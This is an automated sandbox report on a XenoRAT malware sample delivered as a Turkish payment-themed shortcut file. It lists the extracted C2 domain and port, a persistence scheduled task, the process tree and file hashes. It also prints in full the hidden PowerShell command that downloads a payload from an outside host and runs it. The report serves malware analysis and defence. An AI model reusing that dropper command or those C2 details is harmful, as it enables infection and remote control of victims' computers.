Analysis

  • max time kernel
    142s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/05/2024, 12:32

General

  • Target

    Odeme -(Mayis).lnk

  • Size

    2KB

  • MD5

    2ad899ef7b0d361186d8487950b7e167

  • SHA1

    151d04d656e68152cc2116b0837331a7df30eb27

  • SHA256

    2ebd9ab34d58f221ce2034b9f43ad8b128fbc683dab962fbf6222b4eef2a3618

  • SHA512

    2a84054d0f22a042eb2390dba4831eea02700334531e09a3e4ce3b7ca0db71d12ea7d0de30b19280ac0fe746002f4fc96a4904832c81b3dac6647c4a9a50b39b

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif

Extracted

Family

xenorat

C2

dns.requimacofradian.site

Mutex

Xeno_rat_nd8818g

Attributes
  • delay

    60000

  • install_path

    appdata

  • port

    1243

  • startup_name

    uic

Signatures

  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Odeme -(Mayis).lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4892
    • C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command srms-apr.dat;(new-object System.Net.WebClient).DownloadFile('https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif','screenbiwus.pif');./'screenbiwus.pif';(get-item 'screenbiwus.pif').Attributes += 'Hidden';
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:380
      • C:\Users\Admin\AppData\Local\Temp\screenbiwus.pif
        "C:\Users\Admin\AppData\Local\Temp\screenbiwus.pif"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4776
        • C:\Users\Admin\AppData\Local\Temp\screenbiwus.pif
          C:\Users\Admin\AppData\Local\Temp\screenbiwus.pif
          4⤵
          • Executes dropped EXE
          PID:4072
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 80
            5⤵
            • Program crash
            PID:4556
        • C:\Users\Admin\AppData\Local\Temp\screenbiwus.pif
          C:\Users\Admin\AppData\Local\Temp\screenbiwus.pif
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1032
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks.exe" /Create /TN "uic" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2FA6.tmp" /F
            5⤵
            • Creates scheduled task(s)
            PID:4484
        • C:\Users\Admin\AppData\Local\Temp\screenbiwus.pif
          C:\Users\Admin\AppData\Local\Temp\screenbiwus.pif
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4484
          • C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
            "C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2500
            • C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
              C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
              6⤵
              • Executes dropped EXE
              PID:3552
            • C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
              C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
              6⤵
              • Executes dropped EXE
              PID:1304
            • C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
              C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
              6⤵
              • Executes dropped EXE
              PID:4488
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 12
                7⤵
                • Program crash
                PID:4912
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3328
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4072 -ip 4072
    1⤵
      PID:912
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4488 -ip 4488
      1⤵
        PID:4880

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\screenbiwus.pif.log

        Filesize

        706B

        MD5

        d95c58e609838928f0f49837cab7dfd2

        SHA1

        55e7139a1e3899195b92ed8771d1ca2c7d53c916

        SHA256

        0407c814aef0d62aec7fd39b7c2f614746f0d8ff41f8ef957736f520f14b0339

        SHA512

        405310b29a833604c6627063bfdcf055a197e01f633ef21da238f1a6415a02e21315d689b4a6669db23e82152bed6f3492afb60963e6b2a0e9bb2ac09a480b5d

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0dt0sdae.5qr.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\screenbiwus.pif

        Filesize

        243KB

        MD5

        beca6ece3880c98abce728f690fc6af9

        SHA1

        53f7cef644803c6de63008b6ac0dae0c53509760

        SHA256

        1e1870659de245d275192567b800859af41e84711a70754df1a7bc20ee01f79d

        SHA512

        52892dce5b7e9518482cec1e5e415310262897e008a87a120f02432f62d3d13ddad2a290741a6e51db790e430c43d595dfb16e8bf1fc6eddf69a9315e4be5174

      • C:\Users\Admin\AppData\Local\Temp\tmp2FA6.tmp

        Filesize

        1KB

        MD5

        86c5744348e031d55bafc55a87803993

        SHA1

        a6c1b3a008ed463c230cd991a4da483614b327c5

        SHA256

        b9fba7507a114d649f188f61f7ffa32aa3582bdbba35b1f54afaeb7472a985f1

        SHA512

        ea0c6ef44c952825651d8004c98e982e84eff6d7252cd83f76d8e37b33a558eb0e995ba0fa4f47ab493c32781ca31c56de135a0a9c1b487e35925bb13a383731

      • memory/380-12-0x000001D3F57C0000-0x000001D3F57E2000-memory.dmp

        Filesize

        136KB

      • memory/380-13-0x00007FFDF6DD0000-0x00007FFDF7891000-memory.dmp

        Filesize

        10.8MB

      • memory/380-14-0x00007FFDF6DD0000-0x00007FFDF7891000-memory.dmp

        Filesize

        10.8MB

      • memory/380-23-0x00007FFDF6DD0000-0x00007FFDF7891000-memory.dmp

        Filesize

        10.8MB

      • memory/380-2-0x00007FFDF6DD3000-0x00007FFDF6DD5000-memory.dmp

        Filesize

        8KB

      • memory/1032-33-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

      • memory/4776-25-0x00000000013A0000-0x00000000013A6000-memory.dmp

        Filesize

        24KB

      • memory/4776-28-0x0000000005B50000-0x00000000060F4000-memory.dmp

        Filesize

        5.6MB

      • memory/4776-29-0x0000000005640000-0x00000000056D2000-memory.dmp

        Filesize

        584KB

      • memory/4776-30-0x00000000054C0000-0x00000000054C6000-memory.dmp

        Filesize

        24KB

      • memory/4776-26-0x0000000002BF0000-0x0000000002C30000-memory.dmp

        Filesize

        256KB

      • memory/4776-27-0x0000000005500000-0x000000000559C000-memory.dmp

        Filesize

        624KB

      • memory/4776-24-0x00000000009A0000-0x00000000009E6000-memory.dmp

        Filesize

        280KB